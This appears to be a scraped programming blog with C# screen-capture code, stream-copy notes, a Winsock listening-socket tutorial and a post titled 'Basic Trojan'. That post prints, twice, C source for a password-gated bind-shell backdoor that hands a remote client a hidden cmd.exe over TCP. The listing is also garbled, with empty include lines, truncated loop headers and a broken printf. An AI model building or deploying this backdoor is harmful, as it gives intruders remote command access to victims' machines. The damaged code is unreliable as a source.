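/// <summary>
/// Captures the desktop and, when a cursor image is available, draws it onto the capture.
/// </summary>
/// <returns>
/// The bitmap returned by <c>CaptureDesktop</c>, with the cursor composited at the position
/// reported by <c>CaptureCursor</c> when one was captured; <c>null</c> when
/// <c>CaptureDesktop</c> returned <c>null</c>.
/// </returns>
public static Bitmap CaptureDesktopWithCursor()
{
    int cursorX = 0;
    int cursorY = 0;

    Bitmap desktopBMP = CaptureDesktop();

    // The cursor bitmap is only a temporary overlay and is never handed to the caller,
    // so release it on every path, including the one where the desktop capture failed.
    // A using statement accepts a null resource, so no extra null guard is needed here.
    using (Bitmap cursorBMP = CaptureCursor(ref cursorX, ref cursorY))
    {
        if (desktopBMP == null)
        {
            return null;
        }

        if (cursorBMP != null)
        {
            Rectangle r = new Rectangle(cursorX, cursorY,
                                        cursorBMP.Width, cursorBMP.Height);

            // Graphics wraps a native GDI+ object; dispose it instead of waiting for finalization.
            using (Graphics g = Graphics.FromImage(desktopBMP))
            {
                g.DrawImage(cursorBMP, r);
                g.Flush();
            }
        }

        return desktopBMP;
    }
}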
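/// <summary>
/// Captures the current cursor image and reports where its top-left corner sits on screen.
/// </summary>
/// <param name="x">Set to the cursor's screen X position minus the icon's X hotspot when icon info is obtained; otherwise left unchanged.</param>
/// <param name="y">Set to the cursor's screen Y position minus the icon's Y hotspot when icon info is obtained; otherwise left unchanged.</param>
/// <returns>
/// A bitmap of the cursor, or <c>null</c> when cursor info cannot be read, the cursor flags
/// are not <c>CURSOR_SHOWING</c>, the icon cannot be copied, or icon info cannot be read.
/// </returns>
static Bitmap CaptureCursor(ref int x, ref int y)
{
    Win32Stuff.CURSORINFO ci = new Win32Stuff.CURSORINFO();
    ci.cbSize = Marshal.SizeOf(ci);

    if (!Win32Stuff.GetCursorInfo(out ci))
    {
        return null;
    }

    if (ci.flags != Win32Stuff.CURSOR_SHOWING)
    {
        return null;
    }

    IntPtr hicon = Win32Stuff.CopyIcon(ci.hCursor);
    if (hicon == IntPtr.Zero)
    {
        // CopyIcon failed; there is no icon handle to query or convert.
        return null;
    }

    // NOTE(review): hicon and the bitmaps GetIconInfo creates are native handles that this
    // method never releases. The Win32 calls for that are DestroyIcon and DeleteObject; they
    // would need P/Invoke declarations next to the ones Win32Stuff already has.
    Win32Stuff.ICONINFO icInfo;
    if (!Win32Stuff.GetIconInfo(hicon, out icInfo))
    {
        return null;
    }

    // The hotspot is the point inside the icon that tracks the pointer position,
    // so subtracting it yields the icon's top-left corner.
    x = ci.ptScreenPos.x - ((int)icInfo.xHotspot);
    y = ci.ptScreenPos.y - ((int)icInfo.yHotspot);

    // ToBitmap returns an independent copy, so the managed Icon wrapper can be disposed here.
    using (Icon ic = Icon.FromHandle(hicon))
    {
        return ic.ToBitmap();
    }
}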
// ssWithMouseViewer is the PictureBox control
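/// <summary>
/// Draws the given bitmap stretched over the whole client area of <c>ssWithMouseViewer</c>.
/// </summary>
/// <param name="desktop">The bitmap to draw; nothing happens when it is <c>null</c>.</param>
private void Display(Bitmap desktop)
{
    if (desktop == null)
    {
        return;
    }

    Rectangle r = new Rectangle(0, 0, ssWithMouseViewer.Width,
                                ssWithMouseViewer.Height);

    // CreateGraphics hands back a Graphics the caller owns; dispose it after each draw
    // so repeated calls do not accumulate native GDI+ objects.
    using (Graphics g = ssWithMouseViewer.CreateGraphics())
    {
        g.DrawImage(desktop, r);
        g.Flush();
    }
}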
Wednesday, October 27, 2010
Stream.Read Method
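When overridden in a derived class, reads a sequence of bytes from the
current stream and advances the position within the stream by the number of bytes read.
Signature: `public abstract int Read(byte[] buffer, int offset, int count)`.
The return value is the number of bytes actually read; it can be less than `count`, and it is 0 at the end of the stream, so callers must use it rather than assume the buffer was filled.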
Stream.Write Method
When overridden in a derived class, writes a sequence of bytes to the
current stream and advances the current position within this stream by
the number of bytes written.
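// Copy everything from input to output through a fixed-size buffer.
const int size = 4096;
byte[] bytes = new byte[size];   // sized from the constant so buffer and read length cannot drift apart
int numBytes;

// Read reports how many bytes it actually placed in the buffer; write exactly that many,
// never the full buffer, or stale bytes from an earlier pass end up in the output.
while ((numBytes = input.Read(bytes, 0, size)) > 0)
{
    output.Write(bytes, 0, numBytes);
}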
Friday, October 22, 2010
Friday, October 1, 2010
Wednesday, September 22, 2010
Tuesday, November 24, 2009
Creating a Listening Socket
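// The header names were lost in this listing; these are the ones the code below needs
// (Win32 types and MessageBox, Winsock 1.1, and formatted output).
#include <windows.h>
#include <winsock.h>
#include <stdio.h>

#define NETWORK_ERROR -1
#define NETWORK_OK     0

void ReportError(int, const char *);

// Creates a TCP socket, binds it to port 8888 on every local address, listens,
// accepts one client, then closes both sockets and shuts Winsock down.
// Returns NETWORK_OK on success and NETWORK_ERROR when any Winsock call fails.
int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR lpCmd, int nShow)
{
    WORD sockVersion;
    WSADATA wsaData;
    int nret;

    sockVersion = MAKEWORD(1, 1);   // We'd like Winsock version 1.1

    // We begin by initializing Winsock. WSAStartup returns its error code directly,
    // and no other Winsock call is valid if it fails.
    nret = WSAStartup(sockVersion, &wsaData);
    if (nret != 0)
    {
        ReportError(nret, "WSAStartup()");
        return NETWORK_ERROR;
    }

    // Next, create the listening socket
    SOCKET listeningSocket;

    listeningSocket = socket(AF_INET,       // Go over TCP/IP
                             SOCK_STREAM,   // This is a stream-oriented socket
                             IPPROTO_TCP);  // Use TCP rather than UDP

    if (listeningSocket == INVALID_SOCKET)
    {
        nret = WSAGetLastError();           // Get a more detailed error
        ReportError(nret, "socket()");      // Report the error with our custom function
        WSACleanup();                       // Shutdown Winsock
        return NETWORK_ERROR;               // Return an error value
    }

    // Use a SOCKADDR_IN struct to fill in address information
    SOCKADDR_IN serverInfo;

    serverInfo.sin_family = AF_INET;
    // INADDR_ANY accepts connections on every local interface, so the port is reachable
    // from the network. If only local clients are expected, bind to
    // htonl(INADDR_LOOPBACK) instead.
    serverInfo.sin_addr.s_addr = INADDR_ANY;
    serverInfo.sin_port = htons(8888);      // Convert integer 8888 to network-byte order
                                            // and insert into the port field

    // Bind the socket to our local server address
    nret = bind(listeningSocket, (LPSOCKADDR)&serverInfo, sizeof(serverInfo));

    if (nret == SOCKET_ERROR)
    {
        nret = WSAGetLastError();           // Read the error before any other Winsock call
        ReportError(nret, "bind()");
        closesocket(listeningSocket);       // Do not leave the socket open on the error path
        WSACleanup();
        return NETWORK_ERROR;
    }

    // Make the socket listen
    nret = listen(listeningSocket, 10);     // Up to 10 connections may wait at any
                                            // one time to be accept()'ed

    if (nret == SOCKET_ERROR)
    {
        nret = WSAGetLastError();
        ReportError(nret, "listen()");
        closesocket(listeningSocket);
        WSACleanup();
        return NETWORK_ERROR;
    }

    // Wait for a client
    SOCKET theClient;

    theClient = accept(listeningSocket,
                       NULL,                // Optionally, address of a SOCKADDR_IN struct
                       NULL);               // Optionally, address of variable containing
                                            // sizeof ( struct SOCKADDR_IN )
    // Passing NULL for both means the peer address is not captured; pass a SOCKADDR_IN
    // here if connections should be logged or filtered by source.

    if (theClient == INVALID_SOCKET)
    {
        nret = WSAGetLastError();
        ReportError(nret, "accept()");
        closesocket(listeningSocket);
        WSACleanup();
        return NETWORK_ERROR;
    }

    // Send and receive from the client, and finally,
    closesocket(theClient);
    closesocket(listeningSocket);

    // Shutdown Winsock
    WSACleanup();
    return NETWORK_OK;
}

// Shows a message box naming the Winsock call that failed and its error code.
void ReportError(int errorCode, const char *whichFunc)
{
    char errorMsg[92];                      // Declare a buffer to hold
                                            // the generated error message

    ZeroMemory(errorMsg, sizeof(errorMsg)); // Automatically NULL-terminate the string

    // Bounded formatting: at most sizeof(errorMsg) - 1 characters are written, so the
    // final zero byte from ZeroMemory stays in place and a long whichFunc cannot
    // overrun the buffer.
    _snprintf(errorMsg, sizeof(errorMsg) - 1,
              "Call to %s returned error %d!", whichFunc, errorCode);

    MessageBox(NULL, errorMsg, "socketIndication", MB_OK);
}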
Basic Trojan
#include
#include
#include
//File-scope state for a password-gated TCP listener that hands an authenticated
//client a cmd.exe session; main() and CommandPrompt() both read and write it.
//sinrem and bytesWritten are declared here but not referenced in the code shown.
//our variables, we need them globally to use them in all functions
const char welcome[]="Welcome, enter your password please: ";
char bufferin[1024]; //the buffer to read data from socket
char bufferout[65535]; //the buffer to write data to the socket
int i,port; // i is used for loop , port is going to keep the portnumber
SOCKET locsock,remsock; //the sockets we are going to need
SOCKADDR_IN sinloc,sinrem; //the structures needed for our sockets
WSADATA wsadata; //wsadata
STARTUPINFO startinfo; //startupinfo structure for CreateProcess
SECURITY_ATTRIBUTES secat; //security attributes structure needed for CreateProcess
PROCESS_INFORMATION procinfo; //process info struct needed for CreateProcess
int bytesWritten; //number of bytes written gets stored here
DWORD bytesRead,avail,exitcode; //number of bytes read, number of bytes available
//and the exitcode
void CommandPrompt(void); //the function to give the command prompt
void Usage(char AppName[]); //the function which puts the usage of the program to the screen
//Entry point. argv[1] is read as the TCP port and argv[2] as the password (argc must be 3).
//Binds a listener on every local interface, then serves one client at a time:
//sends the prompt, reads a reply, compares it with argv[2] and, on a match, calls CommandPrompt().
//Returns EXIT_FAILURE on bad arguments or a failed bind/listen/accept.
//NOTE(review): the prompt, the password and everything relayed afterwards are sent as
//plain TCP payload with no encryption, so the exchange is visible to network monitoring.
int main(int argc, char *argv[]) //the main function
{
if(argc!=3) //check if we are having enough parameters
{
Usage(argv[0]);
return EXIT_FAILURE;
}
//check if the portnumber given is really a number
//NOTE(review): the loop header below is cut off in this listing (the text after "i" is missing)
for(i=0;i
{
if(isdigit(argv[1][i])==0)
{
printf("Invalid port number.");
return EXIT_FAILURE;
}
}
port=atoi(argv[1]); //make integer from ascii string
//final check to see if it is a real port number
if(port>65535||port<1)
{
printf("Invalid port number.");
return EXIT_FAILURE;
}
//tell windows we want to use sockets
WSAStartup(0x101,&wsadata);
//create socket
locsock=socket(AF_INET,SOCK_STREAM,0);
//fill structure
sinloc.sin_family=AF_INET;
//INADDR_ANY: the listener is bound on all local addresses, not only loopback
sinloc.sin_addr.s_addr=INADDR_ANY;
sinloc.sin_port=htons(port);
//bind the socket to the specified port
if(bind(locsock,(SOCKADDR*)&sinloc,sizeof(SOCKADDR_IN))==SOCKET_ERROR)
{
WSACleanup();
printf("Error binding socket.");
return EXIT_FAILURE;
}
//listen on the specified socket
if(listen(locsock,5)==SOCKET_ERROR)
{
WSACleanup();
printf("Error listening socket.");
return EXIT_FAILURE;
}
//infinite loop here to keep the program listening
while(1)
{
remsock=SOCKET_ERROR;
while(remsock==SOCKET_ERROR)
{
//accept connection to our program
//both address arguments are NULL, so the peer address is not captured here
remsock=accept(locsock,NULL,NULL);
if(remsock==INVALID_SOCKET)
{
//cleanup and exit program
WSACleanup();
printf("Error accepting socket.");
return EXIT_FAILURE;
}
}
//ask for password
send(remsock,welcome,sizeof(welcome),0);
recv(remsock,bufferin,sizeof(bufferin),0);
//check password given
bufferin[strlen(bufferin)-1]=0; //we need this to strip off last character
//the reply is compared with the command-line password using strcmp
if(strcmp(bufferin,argv[2])!=0)
{
send(remsock,"\nAccess Denied.\n",17,0);
}
else
{
CommandPrompt(); //start the commandprompt function
}
closesocket(remsock); //close the socket
}
//we should never reach this point, but i've put this hear just in case ;-)
return EXIT_SUCCESS;
}
//*************************************************************
//Prints the program banner followed by a usage line built from AppName.
//NOTE(review): nothing follows %s in the usage format string as shown; the argument
//placeholders appear to be missing from this listing.
void Usage(char AppName[]) //the function which does nothing more then print out the usage
{
printf("backdoor, written by White Scorpion Security (C) 2005\n");
printf(" ****scorpion ****\n\n");
printf("Usage: %s \n",AppName);
}
//*************************************************************
//Runs one shell session on the already-accepted socket remsock.
//Creates two inheritable anonymous pipes, starts cmd.exe with a hidden window and its
//stdin/stdout/stderr redirected to those pipes, then loops: pipe output is sent to the
//socket and data received from the socket is written to the pipe. The loop ends when the
//received text equals "exit\n" or "EXIT\n", or when the process check at its top breaks out.
//All six handles are closed on both exit paths.
//NOTE(review): for detection, the pattern visible here is a process that owns a listening
//socket and spawns cmd.exe with STARTF_USESTDHANDLES and SW_HIDE; process-creation
//(parent/child) and network-listener telemetry are the places to look for it.
void CommandPrompt(void) //the function which handles the complete commandprompt
{
secat.nLength=sizeof(SECURITY_ATTRIBUTES);
//inheritable handles, so the child process receives the pipe ends
secat.bInheritHandle=TRUE;
DWORD bytesW; //number of bytes written gets stored here
HANDLE newstdin,newstdout,readout,writein; //the handles for our Pipes
char exit1[]={'e','x','i','t',10,0}; //we need this to compare our command to 'exit'
char exit2[]={'E','X','I','T',10,0}; //we need this to compare our command to 'EXIT'
//create the pipes for our command prompt
CreatePipe(&newstdin,&writein,&secat,0);
CreatePipe(&readout,&newstdout,&secat,0);
GetStartupInfo(&startinfo);
//fill another structure
startinfo.dwFlags=STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
//SW_HIDE: the child's console window is not shown
startinfo.wShowWindow=SW_HIDE;
startinfo.hStdOutput=newstdout;
startinfo.hStdError=newstdout;
startinfo.hStdInput=newstdin;
//start cmd prompt
CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,CREATE_NEW_CONSOLE,NULL,NULL,&startinfo,&procinfo);
//endless loop
while(1)
{
//check if cmd.exe is still running, if not then cleanup and start listening again.
if(GetExitCodeProcess(procinfo.hProcess,&exitcode)==STILL_ACTIVE)
{
CloseHandle(procinfo.hThread);
CloseHandle(procinfo.hProcess);
CloseHandle(newstdin);
CloseHandle(writein);
CloseHandle(readout);
CloseHandle(newstdout);
break;
}
bytesRead=0;
//sleep 0.5 seconds to give cmd.exe the chance to startup
sleep(500);
//check if the pipe already contains something we can write to output
PeekNamedPipe(readout,bufferout,sizeof(bufferout),&bytesRead,&avail,NULL);
if(bytesRead!=0)
{
while(bytesRead!=0)
{ //read data from cmd.exe and send to client, then clear the buffer
ReadFile(readout,bufferout,sizeof(bufferout),&bytesRead,NULL);
send(remsock,bufferout,strlen(bufferout),0);
ZeroMemory(bufferout,sizeof(bufferout));
sleep(100);
PeekNamedPipe(readout,bufferout,sizeof(bufferout),&bytesRead,&avail,NULL);
}
}
// clear bufferin
ZeroMemory(bufferin,sizeof(bufferin));
//receive the command given
recv(remsock,bufferin,sizeof(bufferin),0);
//if command is 'exit' or 'EXIT' then we have to capture it to prevent our program
//from hanging.
if((strcmp(bufferin,exit1)==0)||(strcmp(bufferin,exit2)==0))
{
//let cmd.exe close by giving the command, then go to closeup label
WriteFile(writein,bufferin,strlen(bufferin),&bytesW,NULL);
goto closeup;
}
//else write the command to cmd.exe
WriteFile(writein,bufferin,strlen(bufferin),&bytesW,NULL);
//clear the bufferin
//NOTE(review): the loop header below is cut off in this listing (the text after "i" is missing)
for(i=0;i
{
bufferin[i]=0;
}
}
//close up all handles
closeup:
CloseHandle(procinfo.hThread);
CloseHandle(procinfo.hProcess);
CloseHandle(newstdin);
CloseHandle(writein);
CloseHandle(readout);
CloseHandle(newstdout);
}
#include
#include
//File-scope state for a password-gated TCP listener that hands an authenticated
//client a cmd.exe session; main() and CommandPrompt() both read and write it.
//sinrem and bytesWritten are declared here but not referenced in the code shown.
//our variables, we need them globally to use them in all functions
const char welcome[]="Welcome, enter your password please: ";
char bufferin[1024]; //the buffer to read data from socket
char bufferout[65535]; //the buffer to write data to the socket
int i,port; // i is used for loop , port is going to keep the portnumber
SOCKET locsock,remsock; //the sockets we are going to need
SOCKADDR_IN sinloc,sinrem; //the structures needed for our sockets
WSADATA wsadata; //wsadata
STARTUPINFO startinfo; //startupinfo structure for CreateProcess
SECURITY_ATTRIBUTES secat; //security attributes structure needed for CreateProcess
PROCESS_INFORMATION procinfo; //process info struct needed for CreateProcess
int bytesWritten; //number of bytes written gets stored here
DWORD bytesRead,avail,exitcode; //number of bytes read, number of bytes available
//and the exitcode
void CommandPrompt(void); //the function to give the command prompt
void Usage(char AppName[]); //the function which puts the usage of the program to the screen
//Entry point. argv[1] is read as the TCP port and argv[2] as the password (argc must be 3).
//Binds a listener on every local interface, then serves one client at a time:
//sends the prompt, reads a reply, compares it with argv[2] and, on a match, calls CommandPrompt().
//Returns EXIT_FAILURE on bad arguments or a failed bind/listen/accept.
//NOTE(review): the prompt, the password and everything relayed afterwards are sent as
//plain TCP payload with no encryption, so the exchange is visible to network monitoring.
int main(int argc, char *argv[]) //the main function
{
if(argc!=3) //check if we are having enough parameters
{
Usage(argv[0]);
return EXIT_FAILURE;
}
//check if the portnumber given is really a number
//NOTE(review): the loop header below is cut off in this listing (the text after "i" is missing)
for(i=0;i
{
if(isdigit(argv[1][i])==0)
{
printf("Invalid port number.");
return EXIT_FAILURE;
}
}
port=atoi(argv[1]); //make integer from ascii string
//final check to see if it is a real port number
if(port>65535||port<1)
{
printf("Invalid port number.");
return EXIT_FAILURE;
}
//tell windows we want to use sockets
WSAStartup(0x101,&wsadata);
//create socket
locsock=socket(AF_INET,SOCK_STREAM,0);
//fill structure
sinloc.sin_family=AF_INET;
//INADDR_ANY: the listener is bound on all local addresses, not only loopback
sinloc.sin_addr.s_addr=INADDR_ANY;
sinloc.sin_port=htons(port);
//bind the socket to the specified port
if(bind(locsock,(SOCKADDR*)&sinloc,sizeof(SOCKADDR_IN))==SOCKET_ERROR)
{
WSACleanup();
printf("Error binding socket.");
return EXIT_FAILURE;
}
//listen on the specified socket
if(listen(locsock,5)==SOCKET_ERROR)
{
WSACleanup();
printf("Error listening socket.");
return EXIT_FAILURE;
}
//infinite loop here to keep the program listening
while(1)
{
remsock=SOCKET_ERROR;
while(remsock==SOCKET_ERROR)
{
//accept connection to our program
//both address arguments are NULL, so the peer address is not captured here
remsock=accept(locsock,NULL,NULL);
if(remsock==INVALID_SOCKET)
{
//cleanup and exit program
WSACleanup();
printf("Error accepting socket.");
return EXIT_FAILURE;
}
}
//ask for password
send(remsock,welcome,sizeof(welcome),0);
recv(remsock,bufferin,sizeof(bufferin),0);
//check password given
bufferin[strlen(bufferin)-1]=0; //we need this to strip off last character
//the reply is compared with the command-line password using strcmp
if(strcmp(bufferin,argv[2])!=0)
{
send(remsock,"\nAccess Denied.\n",17,0);
}
else
{
CommandPrompt(); //start the commandprompt function
}
closesocket(remsock); //close the socket
}
//we should never reach this point, but i've put this hear just in case ;-)
return EXIT_SUCCESS;
}
//*************************************************************
//Prints the program banner followed by a usage line.
//NOTE(review): the last printf below is cut off in this listing; its format string is
//unterminated and its arguments are missing.
void Usage(char AppName[]) //the function which does nothing more then print out the usage
{
printf("backdoor, written by White Scorpion Security (C) 2005\n");
printf(" ****scorpion ****\n\n");
printf("Usage: %s
}
//*************************************************************
//Runs one shell session on the already-accepted socket remsock.
//Creates two inheritable anonymous pipes, starts cmd.exe with a hidden window and its
//stdin/stdout/stderr redirected to those pipes, then loops: pipe output is sent to the
//socket and data received from the socket is written to the pipe. The loop ends when the
//received text equals "exit\n" or "EXIT\n", or when the process check at its top breaks out.
//All six handles are closed on both exit paths.
//NOTE(review): for detection, the pattern visible here is a process that owns a listening
//socket and spawns cmd.exe with STARTF_USESTDHANDLES and SW_HIDE; process-creation
//(parent/child) and network-listener telemetry are the places to look for it.
void CommandPrompt(void) //the function which handles the complete commandprompt
{
secat.nLength=sizeof(SECURITY_ATTRIBUTES);
//inheritable handles, so the child process receives the pipe ends
secat.bInheritHandle=TRUE;
DWORD bytesW; //number of bytes written gets stored here
HANDLE newstdin,newstdout,readout,writein; //the handles for our Pipes
char exit1[]={'e','x','i','t',10,0}; //we need this to compare our command to 'exit'
char exit2[]={'E','X','I','T',10,0}; //we need this to compare our command to 'EXIT'
//create the pipes for our command prompt
CreatePipe(&newstdin,&writein,&secat,0);
CreatePipe(&readout,&newstdout,&secat,0);
GetStartupInfo(&startinfo);
//fill another structure
startinfo.dwFlags=STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
//SW_HIDE: the child's console window is not shown
startinfo.wShowWindow=SW_HIDE;
startinfo.hStdOutput=newstdout;
startinfo.hStdError=newstdout;
startinfo.hStdInput=newstdin;
//start cmd prompt
CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,CREATE_NEW_CONSOLE,NULL,NULL,&startinfo,&procinfo);
//endless loop
while(1)
{
//check if cmd.exe is still running, if not then cleanup and start listening again.
if(GetExitCodeProcess(procinfo.hProcess,&exitcode)==STILL_ACTIVE)
{
CloseHandle(procinfo.hThread);
CloseHandle(procinfo.hProcess);
CloseHandle(newstdin);
CloseHandle(writein);
CloseHandle(readout);
CloseHandle(newstdout);
break;
}
bytesRead=0;
//sleep 0.5 seconds to give cmd.exe the chance to startup
sleep(500);
//check if the pipe already contains something we can write to output
PeekNamedPipe(readout,bufferout,sizeof(bufferout),&bytesRead,&avail,NULL);
if(bytesRead!=0)
{
while(bytesRead!=0)
{ //read data from cmd.exe and send to client, then clear the buffer
ReadFile(readout,bufferout,sizeof(bufferout),&bytesRead,NULL);
send(remsock,bufferout,strlen(bufferout),0);
ZeroMemory(bufferout,sizeof(bufferout));
sleep(100);
PeekNamedPipe(readout,bufferout,sizeof(bufferout),&bytesRead,&avail,NULL);
}
}
// clear bufferin
ZeroMemory(bufferin,sizeof(bufferin));
//receive the command given
recv(remsock,bufferin,sizeof(bufferin),0);
//if command is 'exit' or 'EXIT' then we have to capture it to prevent our program
//from hanging.
if((strcmp(bufferin,exit1)==0)||(strcmp(bufferin,exit2)==0))
{
//let cmd.exe close by giving the command, then go to closeup label
WriteFile(writein,bufferin,strlen(bufferin),&bytesW,NULL);
goto closeup;
}
//else write the command to cmd.exe
WriteFile(writein,bufferin,strlen(bufferin),&bytesW,NULL);
//clear the bufferin
//NOTE(review): the loop header below is cut off in this listing (the text after "i" is missing)
for(i=0;i
{
bufferin[i]=0;
}
}
//close up all handles
closeup:
CloseHandle(procinfo.hThread);
CloseHandle(procinfo.hProcess);
CloseHandle(newstdin);
CloseHandle(writein);
CloseHandle(readout);
CloseHandle(newstdout);
}





